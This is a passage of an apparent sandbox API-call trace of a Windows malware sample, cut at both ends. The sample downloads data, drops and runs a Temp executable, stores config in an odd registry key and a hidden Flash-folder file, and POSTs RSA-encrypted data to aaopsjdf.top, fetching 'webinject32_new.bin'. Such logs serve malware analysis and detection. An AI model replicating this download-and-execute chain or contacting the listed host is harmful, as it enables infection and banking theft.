lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x3936f61*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.950] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.950] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x3937f61, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x3937f61*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.952] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.952] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x3938f61, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x3938f61*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.952] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.952] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x3939f61, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x3939f61*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.952] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.953] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x393af61, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x393af61*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.953] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.953] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x393bf61, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x393bf61*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.954] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.954] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x393cf61, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x393cf61*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.954] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.955] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x393df61, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x393df61*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.955] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.955] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x393ef61, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x393ef61*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.956] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.956] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x393ff61, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x393ff61*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.957] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.957] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x3940f61, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x3940f61*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.957] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.957] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x3941f61, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x3941f61*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.958] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.958] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x3942f61, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x3942f61*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.958] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.958] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x3943f61, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x3943f61*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0318.002] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0318.002] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x3944f61, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x3944f61*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0318.002] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0318.002] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x3945f61, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x3945f61*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0318.003] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0318.003] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x3946f61, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x3946f61*, lpdwNumberOfBytesRead=0x28febd0*=0x2bf) returned 1 [0318.006] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0318.006] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x3947220, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x3947220*, lpdwNumberOfBytesRead=0x28febd0*=0x0) returned 1 [0318.016] InternetCloseHandle (hInternet=0xcc001c) returned 1 [0318.020] InternetQueryOptionA (in: hInternet=0xcc0010, dwOption=0x15, lpBuffer=0x28febcc, lpdwBufferLength=0x28febc8 | out: lpBuffer=0x28febcc, lpdwBufferLength=0x28febc8) returned 1 [0318.020] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0318.020] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0318.038] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x28fed70 | out: phkResult=0x28fed70*=0x3d0) returned 0x0 [0318.039] RegQueryValueExW (in: hKey=0x3d0, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x28fed9c, lpData=0x0, lpcbData=0x28fed84*=0x0 | out: lpType=0x28fed9c*=0x3, lpData=0x0, lpcbData=0x28fed84*=0x6f0) returned 0x0 [0318.039] RegQueryValueExW (in: hKey=0x3d0, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x28fed9c, lpData=0x238f950, lpcbData=0x28fed84*=0x6f0 | out: lpType=0x28fed9c*=0x3, lpData=0x238f950*, lpcbData=0x28fed84*=0x6f0) returned 0x0 [0318.039] RegCloseKey (hKey=0x3d0) returned 0x0 [0318.039] GetTempPathW (in: nBufferLength=0xf6, lpBuffer=0x28fec94 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\") returned 0x25 [0318.039] wvnsprintfW (in: pszDest=0x28fee9c, cchDest=260, pszFmt="%s%08x.%s", arglist=0x28fec80 | out: pszDest="upde25b4796.exe") returned 15 [0318.039] PathCombineW (in: pszDest=0x28ff0d0, pszDir="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\", pszFile="upde25b4796.exe" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe") returned="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe" [0318.039] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\upde25b4796.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0318.039] CloseHandle (hObject=0x3d0) returned 1 [0318.039] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\upde25b4796.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0318.040] WriteFile (in: hFile=0x3d0, lpBuffer=0x38f0048*, nNumberOfBytesToWrite=0x30000, lpNumberOfBytesWritten=0x28ff0a4, lpOverlapped=0x0 | out: lpBuffer=0x38f0048*, lpNumberOfBytesWritten=0x28ff0a4*=0x30000, lpOverlapped=0x0) returned 1 [0318.042] CloseHandle (hObject=0x3d0) returned 1 [0318.044] wvnsprintfW (in: pszDest=0x238ded0, cchDest=516, pszFmt="\"%s\"", arglist=0x28ff090 | out: pszDest="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe\"") returned 54 [0318.044] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x28ff028*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28ff06c | out: lpCommandLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe\"", lpProcessInformation=0x28ff06c*(hProcess=0x66c, hThread=0x460, dwProcessId=0x594, dwThreadId=0x548)) returned 1 [0318.056] CloseHandle (hObject=0x460) returned 1 [0318.056] CloseHandle (hObject=0x66c) returned 1 [0318.057] SetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe", dwFileAttributes=0x80) returned 1 [0318.057] DeleteFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\upde25b4796.exe")) returned 0 [0318.058] CreateMutexW (lpMutexAttributes=0x877e4, bInitialOwner=0, lpName="ABC6B5B774FF9FD7F54EC277098C64EE") returned 0x66c [0318.058] WaitForSingleObject (hHandle=0x66c, dwMilliseconds=0xffffffff) returned 0x0 [0318.058] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x28fe690 | out: phkResult=0x28fe690*=0x460) returned 0x0 [0318.058] RegQueryValueExW (in: hKey=0x460, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x28fe6bc, lpData=0x0, lpcbData=0x28fe6a4*=0x0 | out: lpType=0x28fe6bc*=0x3, lpData=0x0, lpcbData=0x28fe6a4*=0x6f0) returned 0x0 [0318.059] RegQueryValueExW (in: hKey=0x460, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x28fe6bc, lpData=0x38f0048, lpcbData=0x28fe6a4*=0x6f0 | out: lpType=0x28fe6bc*=0x3, lpData=0x38f0048*, lpcbData=0x28fe6a4*=0x6f0) returned 0x0 [0318.059] RegCloseKey (hKey=0x460) returned 0x0 [0318.059] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x28fe6a4, lpdwDisposition=0x0 | out: phkResult=0x28fe6a4*=0x460, lpdwDisposition=0x0) returned 0x0 [0318.059] RegSetValueExW (in: hKey=0x460, lpValueName="Baywkivyl", Reserved=0x0, dwType=0x3, lpData=0x38f0048*, cbData=0x6f0 | out: lpData=0x38f0048*) returned 0x0 [0318.059] RegCloseKey (hKey=0x460) returned 0x0 [0318.059] ReleaseMutex (hMutex=0x66c) returned 1 [0318.059] CloseHandle (hObject=0x66c) returned 1 [0318.059] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x28fef1c | out: phkResult=0x28fef1c*=0x66c) returned 0x0 [0318.059] RegQueryValueExW (in: hKey=0x66c, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x28fef48, lpData=0x0, lpcbData=0x28fef30*=0x0 | out: lpType=0x28fef48*=0x3, lpData=0x0, lpcbData=0x28fef30*=0x6f0) returned 0x0 [0318.059] RegQueryValueExW (in: hKey=0x66c, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x28fef48, lpData=0x38f0048, lpcbData=0x28fef30*=0x6f0 | out: lpType=0x28fef48*=0x3, lpData=0x38f0048*, lpcbData=0x28fef30*=0x6f0) returned 0x0 [0318.059] RegCloseKey (hKey=0x66c) returned 0x0 [0318.059] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x28ff89c | out: phkResult=0x28ff89c*=0x66c) returned 0x0 [0318.059] RegQueryValueExW (in: hKey=0x66c, lpValueName="Omegovna", lpReserved=0x0, lpType=0x28ff8c8, lpData=0x0, lpcbData=0x28ff8b0*=0x0 | out: lpType=0x28ff8c8*=0x0, lpData=0x0, lpcbData=0x28ff8b0*=0x0) returned 0x2 [0318.059] RegCloseKey (hKey=0x66c) returned 0x0 [0318.060] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\ro4p00rrfog3ie0ev3.ecv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c [0318.060] GetFileSizeEx (in: hFile=0x66c, lpFileSize=0x28ff8a0 | out: lpFileSize=0x28ff8a0*=1776) returned 1 [0318.060] VirtualAlloc (lpAddress=0x0, dwSize=0x6f0, flAllocationType=0x3000, flProtect=0x4) returned 0x240000 [0318.060] ReadFile (in: hFile=0x66c, lpBuffer=0x240000, nNumberOfBytesToRead=0x6f0, lpNumberOfBytesRead=0x28ff8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x28ff8b0*=0x6f0, lpOverlapped=0x0) returned 1 [0318.061] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/webinject32_new.bin", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x28ff8b0 | out: lpUrlComponents=0x28ff8b0) returned 1 [0318.061] GetSystemTime (in: lpSystemTime=0x28ff560 | out: lpSystemTime=0x28ff560*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x3, wDay=0xa, wHour=0x12, wMinute=0x38, wSecond=0x30, wMilliseconds=0x39e)) [0318.061] SystemTimeToFileTime (in: lpSystemTime=0x28ff560, lpFileTime=0x28ff570 | out: lpFileTime=0x28ff570) returned 1 [0318.061] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x28ff5e8, nSize=0x28ff594 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x28ff594) returned 0x1 [0318.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YKYD69Q\\aETAdzjz", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0318.061] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x28ff4e4 | out: phkResult=0x28ff4e4*=0x66c) returned 0x0 [0318.061] RegQueryValueExW (in: hKey=0x66c, lpValueName="Omegovna", lpReserved=0x0, lpType=0x28ff510, lpData=0x0, lpcbData=0x28ff4f8*=0x0 | out: lpType=0x28ff510*=0x0, lpData=0x0, lpcbData=0x28ff4f8*=0x0) returned 0x2 [0318.061] RegCloseKey (hKey=0x66c) returned 0x0 [0318.061] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\ro4p00rrfog3ie0ev3.ecv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c [0318.061] GetFileSizeEx (in: hFile=0x66c, lpFileSize=0x28ff4e8 | out: lpFileSize=0x28ff4e8*=1776) returned 1 [0318.061] VirtualAlloc (lpAddress=0x0, dwSize=0x6f0, flAllocationType=0x3000, flProtect=0x4) returned 0x240000 [0318.061] ReadFile (in: hFile=0x66c, lpBuffer=0x240000, nNumberOfBytesToRead=0x6f0, lpNumberOfBytesRead=0x28ff4f8, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x28ff4f8*=0x6f0, lpOverlapped=0x0) returned 1 [0318.062] wvnsprintfW (in: pszDest=0x28ff59c, cchDest=10, pszFmt="%u.%u.%u", arglist=0x28ff574 | out: pszDest="2.6.1") returned 5 [0318.062] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="2.6.1", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0318.062] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x28ff756, cbEncoded=0x125, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x28ff4b8, pcbStructInfo=0x28ff49c | out: pvStructInfo=0x28ff4b8, pcbStructInfo=0x28ff49c) returned 1 [0318.062] CryptImportPublicKeyInfo (in: hCryptProv=0x3de630, dwCertEncodingType=0x1, pInfo=0x3f2368*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3f2398*, PublicKey.cbData=0x10d, PublicKey.pbData=0x3f23a0*, PublicKey.cUnusedBits=0x0), phKey=0x28ff4a8 | out: phKey=0x28ff4a8*=0x45b918) returned 1 [0318.062] LocalFree (hMem=0x3f2368) returned 0x0 [0318.062] wvnsprintfA (in: pszDest=0x235c308, cchDest=21, pszFmt="%d", arglist=0x28ff3bc | out: pszDest="1515610608") returned 10 [0318.062] CryptEncrypt (in: hKey=0x45b918, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x28ff308*=0x20, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x28ff308*=0x100) returned 1 [0318.062] CryptEncrypt (in: hKey=0x45b918, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2351128*, pdwDataLen=0x28ff31c*=0x20, dwBufLen=0x100 | out: pbData=0x2351128*, pdwDataLen=0x28ff31c*=0x100) returned 1 [0318.062] CryptDestroyKey (hKey=0x45b918) returned 1 [0318.062] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/webinject32_new.bin", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x28ff418 | out: lpUrlComponents=0x28ff418) returned 1 [0318.062] wvnsprintfA (in: pszDest=0x238e0f0, cchDest=516, pszFmt="%s%s", arglist=0x28ff450 | out: pszDest="https://aaopsjdf.top/Uvg4D/j/3AuZ/fdpAv/ra4Kz/Gw3S/kI/A") returned 55 [0318.062] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/Uvg4D/j/3AuZ/fdpAv/ra4Kz/Gw3S/kI/A", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x28ff410 | out: lpUrlComponents=0x28ff410) returned 1 [0318.062] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0318.062] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x2, lpBuffer=0x84024, dwBufferLength=0x4) returned 1 [0318.062] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x8402c, dwBufferLength=0x4) returned 1 [0318.062] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x84034, dwBufferLength=0x4) returned 1 [0318.062] InternetConnectA (hInternet=0xcc0004, lpszServerName="aaopsjdf.top", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0010 [0318.062] HttpOpenRequestA (hConnect=0xcc0010, lpszVerb="POST", lpszObjectName="/Uvg4D/j/3AuZ/fdpAv/ra4Kz/Gw3S/kI/A", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x84000*="text/html", dwFlags=0x8484f700, dwContext=0x0) returned 0xcc001c [0318.062] HttpSendRequestA (hRequest=0xcc001c, lpszHeaders="Connection: close\r\n\x10H", dwHeadersLength=0x13, lpOptional=0x2351038, dwOptionalLength=0x2c0) returned 0 [0318.956] InternetQueryOptionA (in: hInternet=0xcc001c, dwOption=0x1f, lpBuffer=0x28ff334, lpdwBufferLength=0x28ff338 | out: lpBuffer=0x28ff334, lpdwBufferLength=0x28ff338) returned 1 [0318.956] InternetSetOptionA (hInternet=0xcc001c, dwOption=0x1f, lpBuffer=0x28ff334, dwBufferLength=0x4) returned 1 [0318.956] HttpSendRequestA (in: hRequest=0xcc001c, lpszHeaders="Connection: close\r\n\x10H", dwHeadersLength=0x13, lpOptional=0x2351038*, dwOptionalLength=0x2c0 | out: lpOptional=0x2351038*) returned 1 [0319.563] HttpQueryInfoA (in: hRequest=0xcc001c, dwInfoLevel=0x20000013, lpBuffer=0x28ff334, lpdwBufferLength=0x28ff338, lpdwIndex=0x0 | out: lpBuffer=0x28ff334*, lpdwBufferLength=0x28ff338*=0x4, lpdwIndex=0x0) returned 1 [0319.563] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0319.563] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x2399950, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x2399950*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0319.565] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0319.565] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x239a950, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x239a950*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0319.566] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0319.566] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x239b950, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x239b950*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0319.566] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0319.566] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x239c950, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x239c950*, lpdwNumberOfBytesRead=0x28ff448*=0xf2b) returned 1 [0319.566] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0319.566] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x239d87b, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x239d87b*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0319.567] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0319.567] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x239e87b, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x239e87b*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0319.567] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0319.567] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x239f87b, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x239f87b*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0319.567] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0319.568] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23a087b, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23a087b*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0319.568] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0319.568] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23a187b, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23a187b*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0319.632] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0319.632] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23a287b, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23a287b*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0319.634] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0319.634] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23a387b, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23a387b*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0319.635] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0319.635] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23a487b, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23a487b*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0319.637] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0319.637] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23a587b, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23a587b*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0319.639] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0319.639] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23a687b, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23a687b*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0319.640] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0319.640] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23a787b, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23a787b*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0319.640] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0319.641] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23a887b, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23a887b*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0319.641] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0319.641] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23a987b, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23a987b*, lpdwNumberOfBytesRead=0x28ff448*=0xff7) returned 1 [0319.643] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0319.643] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23aa872, dwNumberOfBytesToRead=0x1000, 